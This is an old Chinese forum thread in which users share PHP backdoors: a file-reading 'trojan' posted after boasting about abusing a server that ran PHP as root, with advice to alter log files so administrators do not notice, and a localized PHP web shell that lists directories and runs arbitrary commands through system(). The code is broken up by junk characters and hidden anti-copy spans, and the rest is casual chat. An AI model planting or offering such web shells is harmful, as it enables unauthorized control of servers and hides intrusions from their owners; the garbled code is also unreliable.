我写的一个PHP的简单木马

ASEE

重在实用，HoHo,某天发现某个LINUX服务器居然使用root权限执行PHP，真是让我心动不已，浏览器就是我的SHELL，因为有root权限，因此我就%￥##··*，当然不要忘了修改日志文件，HoHo,不然管理员会告你。 ( h. |1 n$ g* N4 K5 A5 v; |9 J/ Nxx.php如下（太简陋了，不免高手门笑话，hoho） B& j z& O' W2 Y8 s: ]2 I) S* [* }* s, y, y) V% n! P7 A//获得指定文件的文本 function getfile($filename) { 1 o* K F4 f9 M2 C9 r+ Z( H if (!$filename){ return false; } * T [2 r# n- ] $fp = @fopen($filename,"r"); 4 Z! n& K( o/ C: T0 c7 U if (!$fp){ return false; + G6 M2 R! }' N' K } $fdata = @fread($fp,filesize($filename)); : h) L& f' N) s: D fclose($fp); return $fdata; & \+ V9 m0 n( R& L9 r+ v5 p} $str="

yzhlinux

ACEE 的程序用来得到文件在好不过，工厂虽小，但是还用了摸板替换的思想，可贵！ * F3 h' t& l# i; K& i但是在得到指定文件之前必须先看看服务器上都有些什么，想在服务器上执行命令，ACEE 的命令执行功能不够，这里我给大家这个专业的 shell。 9 B* W: b& `, \) @1 B% q3 R/* GNU */ /* 您可以任意传播，不过请一定写出作者名字 */ /* 原作者： Martin Geisler 改写汉化： YZHLINUX */ . i* A$ W9 s, _7 j8 } 5 k- b9 A7 x' _$ z% P : @9 [9 G0 z0 [7 M. l0 |4 B" V* M1 M/* 首先检查 $work_dir 是否被设置了值,这是我们的工作目录 */ + N3 R! @% D9 g& I# s& s+ E- G7 ]if (isset($work_dir)) { /* 说明已经设置了 工作目录 ,那么我们就吧当前目录改变倒这个地方 */ chdir($work_dir); $work_dir = exec("pwd"); // pwd 是 Unix 中显示当前目录的命令,这里我们执行它.得到当前目录 } else { " o! W- [. R+ u8 q. G7 i /* 如果没有设置 工作目录,那么我们就到 apache 的工作目录 注: $DOCUMENT_ROOT 是系统提供的*/ . j# G# K: }& l6 T! ^: O4 b chdir($DOCUMENT_ROOT); $work_dir = $DOCUMENT_ROOT; } 8 I# P& R$ T4 l$ z?>

当前工作目录: X2 p4 h( u! y. C! C+ C$work_dir_splitted = explode("/", substr($work_dir, 1)); ) X( d" ~: ~+ z6 W3 \7 Oecho "Root/"; - }, {. s% q( w3 \% Q: B1 cif ($work_dir_splitted[0] == "") { $work_dir = "/"; /* 根目录. */ ! x! m8 d7 z/ l, R1 t; f* v9 Z2 j/ J} else { for ($i = 0; $i < count($work_dir_splitted); $i++) { ; H6 u3 {2 z* l /* echo "i = $i";*/ ) }$ [, k( r4 i" b $url .= "/".$work_dir_splitted[$i]; echo "$work_dir_splitted[$i]/"; } ) @2 h% X( M, n6 H: h7 X! K% P3 h} ?>

; o7 O9 s# g4 X% z; }1 h

选择新的工作目录:

, g% \& j$ U7 s1 z1 A/ F( u# g( K3 u: k, V/* 现在我们对这个目录坐一个文件列表 */ $dir_handle = opendir($work_dir); /* 来一个遍历找出所有的文件和目录 */ % c q/ S0 \0 }1 F# qwhile ($dir = readdir($dir_handle)) { if (is_dir($dir)) { 6 z0 }% ~1 U* k$ p- t4 j" k3 Y9 a! W6 a if ($dir == ".") { echo "Current Directory\n"; } elseif ($dir == "..") { ) Y& r6 M" `# c7 o% F. o* ^ /* 我们找到了父目录,我们要注意里看看父目录是不是根目录 (/) */ if (strlen($work_dir) == 1) { + m" n, P4 c, `$ B7 f$ O /* 长度只有 1 ---- 那么只能是 '/' 了 */ ) k! K# `% D$ U3 }3 i. ` } elseif (strrpos($work_dir, "/") == 0) { 7 Z: p1 O6 w4 E- L4 Z' m0 j! I* f4 P /* 发现第一个字符是 / 说明我到了顶层的目录了比如: /bin 或者 /home etc... */ : y. B/ H% m6 B- h$ s2 m echo "Parent Directory\n"; } else { echo "Parent Directory\n"; A- N: y% ?( U } . G. p3 D' |0 W% P' D9 E } else { : d) m ~3 A! |1 j+ S; K if ($work_dir == "/") { . O `7 M# K( M+ b: H _0 g echo "$dir\n"; ( R, l) O( A* e$ C& X7 ` } else { echo "$dir\n"; } l/ [7 p9 W3 ]* I/ k p* S4 }8 p+ ~ } } 8 S& R6 {3 b f( G} / T, I8 L3 E* n; U5 W7 d- l closedir($dir_handle);//不要忘记关闭 - i5 T! `1 x- H?> 5 s8 o1 m* b* M+ g$ E

命令:

>

是否捕获错误信息?

' N5 y; \% {/ q# }8 w

Output:

" L! f( G7 n9 U* L- ]* D. Q1 g<span style="display:none">8 d( I, l2 |8 o</span><?php<font class="jammer">1 A" h& X# h6 a& O$ [</font> if ($command) {<font class="jammer">. [4 d# t6 k8 Q6 ?/ u</font> if ($stderr) { <span style="display:none">& a& Y2 I( R7 |3 i- g& _2 n' z</span> /* 这个命令组能看懂吗? <font class="jammer">2 e8 @! M; n- M# i</font> 短短的一句语句但是做的事情有: 执行命令,把输出的结果保存到 output.txt ,显示 output.txt ,然后删除它!*/<font class="jammer">. g& g; u/ A0 B</font> system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");<font class="jammer">; P( w- K( O/ C) K$ ~</font> }else {<font class="jammer">8 _9 e3 O; j" ?</font> system($command);<font class="jammer">8 x6 b% Q8 w/ Y- o9 j</font> } <span style="display:none">5 c# g, ?/ r/ h% X9 Z0 h; N( q</span>} <span style="display:none">/ ~6 g1 ~3 M! x$ Z</span>?><font class="jammer">& M; Y: }) b- [: @</font>

" e- U2 i# N$ p2 f/ g . H: e: M: F* ~, B. D9 c 0 f4 g! q7 j, G4 l& e- B v # @+ S1 f5 ^0 T: X3 m 4 j& g9 D3 [# `) x1 D! @1 L

[此贴子已经被作者于2003-8-6 15:48:22编辑过]

( l+ y* k5 m6 L0 U1 \% Z

ASEE

不错，不错。

猴子很忙

能力有限，看不懂。。

晕晕了，第二篇就不看了，第一篇好像见到过了

ASEE

我写的代码还算简洁，噢，HOHO。。。那里见过也不奇怪，需要的时候就自己写。抄一百行代码还不如自己写一行，PHP只能处理字符，处理网叶，干不成大事，说白了，PHP还不如UNIX的各种SHELL。

yzhlinux

PHP 也是可以做Unix 的一个shell的。
语法就是php的语法，只要把编译好的cgi模式的解析程序执行，就是一个shell外壳了

ASEE

是啊，我都有这个想法啊，php 的 VC 源代码我看了很久了，我觉得可以把它改动成我们所设想的东西，嵌入到我们的其他程序中去做控制脚本。HoHo,功能强大哦！
7 z; I" `, O- D% d! R( |不过不知道版权会被我们侵犯到什么地步 ：（

# \8 M$ y5 U( D

yzhlinux  ASEE，你们都是工程的吗？计算机系吗？程序方面很强哦。
我是工程的，但不是计算机系的。

yzhlinux

这你也看的出来？
: T) f6 w9 l" c! r我们既不是工程的也不是计算机系的

哦，这里的工程比较多啊，所以猜的，那你们什么学校的啊？

yzhlinux

我们都工作了你看不出来吗？

呵呵，没看出来，都是哪儿的，搞程序的？

yzhlinux

提供真人实姓，就不叫BBS了，那我注册了帐号还有什么意思？ ：）

又没让你说姓名，我想了解一下这里的高手有多少是学生啊

ASEE

以下是引用ASEE在2003-8-12 23:12:00的发言：
是啊，我都有这个想法啊，php 的 VC 源代码我看了很久了，我觉得可以把它改动成我们所设想的东西，嵌入到我们的其他程序中去做控制脚本。HoHo,功能强大哦！
不过不知道版权会被我们侵犯到什么地步 ：（
6 r2 F7 v! G8 U' a

  z# G+ r, d, N8 F( U5 w我有种发梦的感觉，是不是我眼花了，昨晚太累打字打错了，竟然写出这样的话来，我死也不信，如果有人攻击BBS，那就另当别论，或者帮主看不过去，那有另当别论。

yzhlinux

哪里啊，那是我要回复你的，结果却按错了，点成了编辑 ：（。
9 L; F+ \5 R9 R# [想恢复都不行了！ 你说的是什么我现在都忘记了！郁闷！

ASEE

看来这个BB让人郁闷，不过还算快。要不真象上CSDN一样，半天都进不去，干脆不去了，XML做的看来也不过如此，WEB SERVICE也不过如此，.NET也不过如此。

yzhlinux

这里人不多啊，自然快，CSDN 是快的，主要人太多，同时再线的比这里多500倍以上，半夜2:00以后你试试，那时没人，狂快！

yzhlounx 你是工程的吧  呵呵
8 k* a# m, L2 h( d. a